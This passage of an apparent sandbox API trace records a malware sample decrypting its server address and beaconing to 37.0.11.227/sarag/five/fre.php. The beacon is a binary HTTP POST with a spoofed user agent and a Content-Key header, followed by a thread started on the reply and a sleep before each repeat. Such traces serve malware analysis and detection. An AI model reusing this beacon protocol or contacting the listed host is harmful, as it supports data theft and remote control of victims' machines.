phProv=0x19fca8*=0x6aecc0) returned 1 [0270.200] GetProcessHeap () returned 0x690000 [0270.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0270.201] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.202] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.203] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.206] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.207] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.207] GetProcessHeap () returned 0x690000 [0270.207] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0270.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.209] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0270.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.211] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.215] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0270.215] GetProcessHeap () returned 0x690000 [0270.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.217] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.217] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.218] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.219] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.220] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.220] GetProcessHeap () returned 0x690000 [0270.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0270.220] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.221] GetProcessHeap () returned 0x690000 [0270.221] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0270.221] GetProcessHeap () returned 0x690000 [0270.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.222] GetProcessHeap () returned 0x690000 [0270.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0270.222] GetProcessHeap () returned 0x690000 [0270.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0270.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.223] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.232] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.232] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0270.244] GetProcessHeap () returned 0x690000 [0270.244] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0270.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.245] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.246] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.250] GetProcessHeap () returned 0x690000 [0270.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0270.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.252] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0270.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.253] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.255] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0270.255] GetProcessHeap () returned 0x690000 [0270.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.256] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0270.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.257] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0270.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.258] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0270.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.260] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0270.260] GetProcessHeap () returned 0x690000 [0270.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0270.260] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0270.260] GetProcessHeap () returned 0x690000 [0270.260] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0270.260] socket (af=2, type=1, protocol=6) returned 0x818 [0270.261] connect (s=0x818, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0270.292] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0270.292] GetProcessHeap () returned 0x690000 [0270.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0270.292] GetProcessHeap () returned 0x690000 [0270.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0270.293] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.294] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.294] GetProcessHeap () returned 0x690000 [0270.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af8c0 [0270.294] GetProcessHeap () returned 0x690000 [0270.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.295] GetProcessHeap () returned 0x690000 [0270.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0270.295] GetProcessHeap () returned 0x690000 [0270.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0270.296] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.297] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.297] GetProcessHeap () returned 0x690000 [0270.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0270.297] GetProcessHeap () returned 0x690000 [0270.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.299] send (s=0x818, buf=0x6ad508*, len=242, flags=0) returned 242 [0270.300] send (s=0x818, buf=0x6aba40*, len=159, flags=0) returned 159 [0270.300] GetProcessHeap () returned 0x690000 [0270.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0270.300] recv (in: s=0x818, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0270.363] GetProcessHeap () returned 0x690000 [0270.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0270.364] GetProcessHeap () returned 0x690000 [0270.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0270.365] GetProcessHeap () returned 0x690000 [0270.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af8c0 | out: hHeap=0x690000) returned 1 [0270.365] GetProcessHeap () returned 0x690000 [0270.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0270.365] closesocket (s=0x818) returned 0 [0270.366] GetProcessHeap () returned 0x690000 [0270.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0270.366] GetProcessHeap () returned 0x690000 [0270.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.366] GetProcessHeap () returned 0x690000 [0270.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0270.367] GetProcessHeap () returned 0x690000 [0270.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0270.369] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15cc) returned 0x818 [0270.371] Sleep (dwMilliseconds=0xea60) [0270.372] GetProcessHeap () returned 0x690000 [0270.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0270.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.374] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0270.393] GetProcessHeap () returned 0x690000 [0270.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0270.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.395] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.396] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.397] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.397] GetProcessHeap () returned 0x690000 [0270.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0270.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.399] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0270.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.400] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.404] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0270.404] GetProcessHeap () returned 0x690000 [0270.404] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.425] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.426] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.427] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.428] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.430] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.430] GetProcessHeap () returned 0x690000 [0270.430] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0270.430] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.430] GetProcessHeap () returned 0x690000 [0270.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0270.431] GetProcessHeap () returned 0x690000 [0270.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.431] GetProcessHeap () returned 0x690000 [0270.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0270.431] GetProcessHeap () returned 0x690000 [0270.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0270.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.442] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0270.452] GetProcessHeap () returned 0x690000 [0270.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0270.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.453] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0270.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.454] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.455] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.455] GetProcessHeap () returned 0x690000 [0270.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0270.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.459] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0270.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.460] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0270.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.461] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0270.461] GetProcessHeap () returned 0x690000 [0270.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0270.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.462] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0270.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.463] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0270.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.464] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0270.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0270.466] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0270.466] GetProcessHeap () returned 0x690000 [0270.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0270.466] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0270.466] GetProcessHeap () returned 0x690000 [0270.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0270.466] socket (af=2, type=1, protocol=6) returned 0x81c [0270.466] connect (s=0x81c, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0270.499] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0270.499] GetProcessHeap () returned 0x690000 [0270.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0270.499] GetProcessHeap () returned 0x690000 [0270.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0270.500] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.502] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.502] GetProcessHeap () returned 0x690000 [0270.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0270.502] GetProcessHeap () returned 0x690000 [0270.503] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.513] GetProcessHeap () returned 0x690000 [0270.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0270.513] GetProcessHeap () returned 0x690000 [0270.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0270.516] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0270.517] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.517] GetProcessHeap () returned 0x690000 [0270.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0270.517] GetProcessHeap () returned 0x690000 [0270.518] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0270.518] send (s=0x81c, buf=0x6ad508*, len=242, flags=0) returned 242 [0270.519] send (s=0x81c, buf=0x6aba40*, len=159, flags=0) returned 159 [0270.519] GetProcessHeap () returned 0x690000 [0270.519] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0270.519] recv (in: s=0x81c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0270.594] GetProcessHeap () returned 0x690000 [0270.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0270.595] GetProcessHeap () returned 0x690000 [0270.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0270.595] GetProcessHeap () returned 0x690000 [0270.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0270.596] GetProcessHeap () returned 0x690000 [0270.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0270.596] closesocket (s=0x81c) returned 0 [0270.597] GetProcessHeap () returned 0x690000 [0270.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0270.597] GetProcessHeap () returned 0x690000 [0270.597] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0270.597] GetProcessHeap () returned 0x690000 [0270.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0270.598] GetProcessHeap () returned 0x690000 [0270.598] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0270.598] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15d0) returned 0x81c [0270.601] Sleep (dwMilliseconds=0xea60) [0270.602] GetProcessHeap () returned 0x690000 [0270.602] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0270.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.604] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.619] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0270.632] GetProcessHeap () returned 0x690000 [0270.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0270.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.642] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0270.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.643] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.644] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.644] GetProcessHeap () returned 0x690000 [0270.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0270.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.648] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0270.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0270.654] 